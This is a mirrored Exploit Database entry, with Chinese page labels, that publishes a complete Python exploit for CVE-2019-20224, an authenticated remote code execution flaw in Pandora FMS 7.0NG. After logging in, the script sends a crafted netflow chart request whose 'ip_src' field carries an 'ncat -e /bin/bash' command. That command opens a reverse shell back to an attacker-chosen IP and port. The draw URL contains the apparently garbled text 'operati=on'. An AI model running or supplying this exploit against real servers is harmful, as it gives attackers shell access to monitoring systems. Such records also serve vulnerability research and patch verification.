Pandora 7.0NG – Remote Code Execution

• Exploit Database
• 24 阅读

• 作者： Askar
  日期： 2020-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47898/

• # Exploit Title: Pandora 7.0NG - Remote Code Execution
  # Date: 2019-11-14
  # Exploit Author: Askar (@mohammadaskar2)
  # CVE: CVE-2019-20224
  # Vendor Homepage: https://pandorafms.org/
  # Software link: https://pandorafms.org/features/free-download-monitoring-software/
  # Version: v7.0NG
  # Tested on: CentOS 7.3 / PHP 5.4.16
  
  #!/usr/bin/python3
  
  import requests
  import sys
  
  if len(sys.argv) != 6:
  print("[+] Usage : ./exploit.py target username password ip port")
  exit()
  
  target = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  ip = sys.argv[4]
  port = int(sys.argv[5])
  
  request = requests.session()
  
  login_info = {
  "nick": username,
  "pass": password,
  "login_button": "Login"
  }
  
  login_request = request.post(
  target+"/pandora_console/index.php?login=1",
  login_info,
  verify=False,
  allow_redirects=True
   )
  
  resp = login_request.text
  
  if "User not found in database" in resp:
  print("[-] Login Failed")
  exit()
  else:
  print("[+] Logged In Successfully")
  
  print("[+] Sending crafted graph request ..")
  
  body_request = {
  "date": "0",
  "time": "0",
  "period": "0",
  "interval_length": "0",
  "chart_type": "netflow_area",
  "max_aggregates": "1",
  "address_resolution": "0",
  "name": "0",
  "assign_group": "0",
  "filter_type": "0",
  "filter_id": "0",
  "filter_selected": "0",
  "ip_dst": "0",
  "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
  "draw_button": "Draw"
  }
  
  draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0"
  print("[+] Check your netcat ;)")
  request.post(draw_url, body_request)